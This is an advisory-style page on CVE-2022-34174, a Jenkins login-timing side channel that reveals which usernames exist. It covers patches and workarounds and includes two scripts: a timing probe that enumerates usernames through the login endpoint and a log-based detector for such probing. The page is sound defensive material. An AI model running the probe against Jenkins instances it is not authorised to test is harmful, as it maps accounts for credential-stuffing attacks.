CVE-2022-34174
📋 TL;DR
This vulnerability in Jenkins (2.355 and earlier, LTS 2.332.3 and earlier) is a timing side channel in the login form: a login attempt with a nonexistent username is answered measurably faster or slower than one with a valid username and a wrong password. An unauthenticated attacker can therefore confirm which usernames exist, which is reconnaissance for credential stuffing or brute-force attacks. Only instances using the Jenkins user database security realm are affected.
💻 Affected Systems
- Jenkins
📦 What is this software?
Jenkins by Jenkins
⚠️ Risk & Real-World Impact
Worst Case
Attackers can enumerate valid usernames and then perform targeted password attacks, potentially compromising user accounts and gaining unauthorized access to the Jenkins instance.
Likely Case
Attackers enumerate valid usernames to build targeted credential stuffing lists, increasing success rates for subsequent authentication attacks.
If Mitigated
With rate limiting and strong password policies, impact is limited to slow reconnaissance that does not directly lead to account compromise. Note that rate limiting only slows enumeration; the side channel itself remains until the instance is patched.
🎯 Exploit Status
Exploitation requires only unauthenticated POST requests to the login form and a clock: the attacker submits a wrong password for each candidate username, measures the response time, and compares the per-username medians (repeated samples suppress network jitter). This is easily automated with a short script.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Jenkins 2.356, LTS 2.332.4
Vendor Advisory: https://www.jenkins.io/security/advisory/2022-06-22/#SECURITY-2566
Restart Required: Yes
Instructions:
1. Back up your Jenkins instance.
2. Upgrade to Jenkins 2.356 or LTS 2.332.4 or later.
3. Restart the Jenkins service.
4. Verify the fix by checking the running version.
🔧 Temporary Workarounds
Enable rate limiting
Configure rate limiting on authentication attempts to make timing attacks slow and noisy; it does not remove the timing difference, since a handful of samples per username is enough to measure it
Configure via Jenkins security settings or use reverse proxy rate limiting on the login endpoint (/j_spring_security_check)
Switch authentication method
Use an external authentication provider (LDAP, OAuth, etc.) instead of the Jenkins user database; the flaw is specific to that realm
Configure via Jenkins > Manage Jenkins > Configure Global Security (make sure an administrator account exists in the new realm before switching)
🧯 If You Can't Patch
- Implement network-level rate limiting using WAF or reverse proxy
- Monitor authentication logs for unusual patterns of login attempts
🔍 How to Verify
Check if Vulnerable:
Check Jenkins version via Manage Jenkins > About Jenkins or via CLI
Check Version:
java -jar jenkins.war --version on the server, or the version shown in the footer of the Jenkins web interface
Verify Fix Applied:
Verify the version is 2.356 or LTS 2.332.4 or later, and confirm that the login response time for a known-valid username with a wrong password is indistinguishable from that for a nonexistent username
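The measurement script referred to above, as an added example (it is not code from the page or from the Jenkins project). It sends a wrong password for each candidate username, interleaves the names across rounds so that server drift hits every name equally, and reports whether the per-username median response times split into two separated groups. The login path and form field names (j_username, j_password, from) are assumptions about the standard Jenkins login form; simulated_post is an offline stand-in with constructed latencies so the script runs without a server, and the assumption that existing accounts are the slower group is only the expected shape of the unfixed behaviour, not something the advisory states.

```python
"""Login-timing probe for Jenkins (added example, not Jenkins project code)."""
import random
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request

LOGIN_PATH = "/j_spring_security_check"  # assumption: default Jenkins login handler
WRONG_PASSWORD = "definitely-not-the-password"


def post_login(base_url, username, password, timeout=10):
    """Submit one login attempt to a live Jenkins and return elapsed seconds."""
    body = urllib.parse.urlencode(
        {"j_username": username, "j_password": password, "from": "/"}
    ).encode()
    req = urllib.request.Request(base_url.rstrip("/") + LOGIN_PATH, data=body, method="POST")
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError:
        pass  # a rejected login is the expected outcome; only the timing matters
    return time.perf_counter() - start


def simulated_post(base_url, username, password, _existing=("admin", "ci-bot")):
    """Offline stand-in for post_login with constructed latencies: ~20 ms, plus
    ~90 ms when the account exists (assumed shape of the unfixed behaviour)."""
    return 0.020 + random.uniform(0, 0.004) + (0.090 if username in _existing else 0.0)


def collect_timings(base_url, usernames, rounds=10, post=post_login):
    """Round-robin over usernames so drift affects all names equally."""
    samples = {u: [] for u in usernames}
    for _ in range(rounds):
        for u in usernames:
            samples[u].append(post(base_url, u, WRONG_PASSWORD))
    return samples


def analyze(samples, noise_floor=0.005):
    """Return (discrepancy_observed, fast_group, slow_group).

    Usernames are sorted by median response time. The largest gap between
    neighbouring medians is compared with the largest within-username spread
    (interquartile range) and with an absolute noise floor (5 ms by default).
    Only when the gap dominates both is the split reported as a real side channel.
    """
    medians = {u: statistics.median(v) for u, v in samples.items()}
    ordered = sorted(medians, key=medians.get)
    if len(ordered) < 2:
        return False, ordered, []
    spreads = []
    for v in samples.values():
        q = statistics.quantiles(v, n=4) if len(v) >= 2 else [v[0]] * 3
        spreads.append(q[2] - q[0])
    noise = max(spreads)
    gaps = [(medians[ordered[i + 1]] - medians[ordered[i]], i) for i in range(len(ordered) - 1)]
    biggest, idx = max(gaps)
    if biggest <= 3 * noise or biggest <= noise_floor:
        return False, ordered, []
    return True, ordered[: idx + 1], ordered[idx + 1:]


if __name__ == "__main__":
    random.seed(1)
    names = ["admin", "ci-bot", "nobody", "zz-guess"]
    # Swap simulated_post for post_login (and a real base_url) to probe an instance you own.
    found, fast, slow = analyze(collect_timings("http://jenkins.example", names, post=simulated_post))
    print("timing discrepancy observed:", found)
    print("fast group:", fast)
    print("slow group:", slow)
```

On a patched instance analyze should return False for a mix of real and made-up names; over a real network use more rounds (30 or more) so the medians settle. Which group is the slow one depends on the implementation, so treat the split itself, not its direction, as the finding.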
📡 Detection & Monitoring
Log Indicators:
- Many failed login attempts from one source, each with a different username (enumeration rather than a user mistyping a password)
- Login attempts arriving at a regular cadence, as a scripted timing probe produces
Network Indicators:
- Unusual volume of POST requests to /j_spring_security_check endpoint
SIEM Query:
source="jenkins.log" AND "Failed to authenticate" AND count by src_ip > threshold (pseudo-query: adapt the message string to the failure message your Jenkins version logs and the field names to your SIEM; Jenkins' own log typically does not record the client address, so correlate with reverse-proxy access logs for the source IP)
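The network indicator above turned into detection logic, as an added example (not from the page or the Jenkins project). It parses reverse-proxy access logs in the nginx "combined" format, counts POSTs to the login endpoint per source IP in a sliding window, and measures how regular the inter-arrival gaps are, since a scripted probe fires at a near-constant cadence. The log lines are constructed for the example; the assumptions are that Jenkins sits behind nginx and that a rejected login is answered with a 302 redirect.

```python
"""Burst and cadence detector for Jenkins login POSTs in nginx access logs
(added example, not Jenkins project code)."""
import re
import statistics
from collections import defaultdict
from datetime import datetime

LOGIN_PATH = "/j_spring_security_check"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r"(?P<status>\d{3}) "
)


def _line(ip, ts, method="POST", path=LOGIN_PATH, status=302):
    """Build one nginx 'combined' access-log line (constructed sample data)."""
    return (f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 0 '
            f'"http://jenkins.example/login" "python-urllib/3.11"')


# Constructed sample: one ordinary user with two attempts minutes apart,
# one source hammering the login handler once per second.
SAMPLE_LOG = [
    _line("198.51.100.5", "22/Jun/2022:10:00:03 +0000", "GET", "/login", 200),
    _line("198.51.100.5", "22/Jun/2022:10:00:12 +0000"),
    _line("198.51.100.5", "22/Jun/2022:10:05:40 +0000"),
    _line("203.0.113.7", "22/Jun/2022:10:15:29 +0000", "GET", "/login", 200),
] + [_line("203.0.113.7", f"22/Jun/2022:10:15:{s:02d} +0000") for s in range(30, 42)]


def parse(line):
    """Return (ip, timestamp, method, path-without-query, status) or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0], int(m["status"])


def login_posts_by_ip(lines):
    """Group timestamps of POSTs to the login handler by source address."""
    events = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec[2] == "POST" and rec[3] == LOGIN_PATH:
            events[rec[0]].append(rec[1])
    for stamps in events.values():
        stamps.sort()
    return events


def max_in_window(stamps, window_s):
    """Largest number of attempts falling inside any window_s-second span."""
    lo, best = 0, 0
    for hi, t in enumerate(stamps):
        while (t - stamps[lo]).total_seconds() > window_s:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def regularity(stamps):
    """Coefficient of variation of inter-arrival gaps: near 0 means a fixed-rate loop.
    None when there are too few attempts to judge."""
    gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
    if len(gaps) < 2:
        return None
    mean = statistics.mean(gaps)
    return 0.0 if mean == 0 else statistics.pstdev(gaps) / mean


def report(lines, window_s=60, threshold=10, max_cv=0.25):
    """Flag IPs whose login POSTs exceed threshold in a window, or are suspiciously regular."""
    flagged = {}
    for ip, stamps in login_posts_by_ip(lines).items():
        burst = max_in_window(stamps, window_s)
        cv = regularity(stamps)
        if burst >= threshold or (cv is not None and cv <= max_cv and len(stamps) >= 5):
            flagged[ip] = {"attempts": len(stamps), "max_in_window": burst, "cadence_cv": cv}
    return flagged


if __name__ == "__main__":
    for ip, info in report(SAMPLE_LOG).items():
        print(ip, info)
```

The cadence check catches slow-and-steady probing that stays under a volume threshold, which is exactly how an attacker works around rate limiting; tune window_s, threshold and max_cv to your traffic before alerting on it.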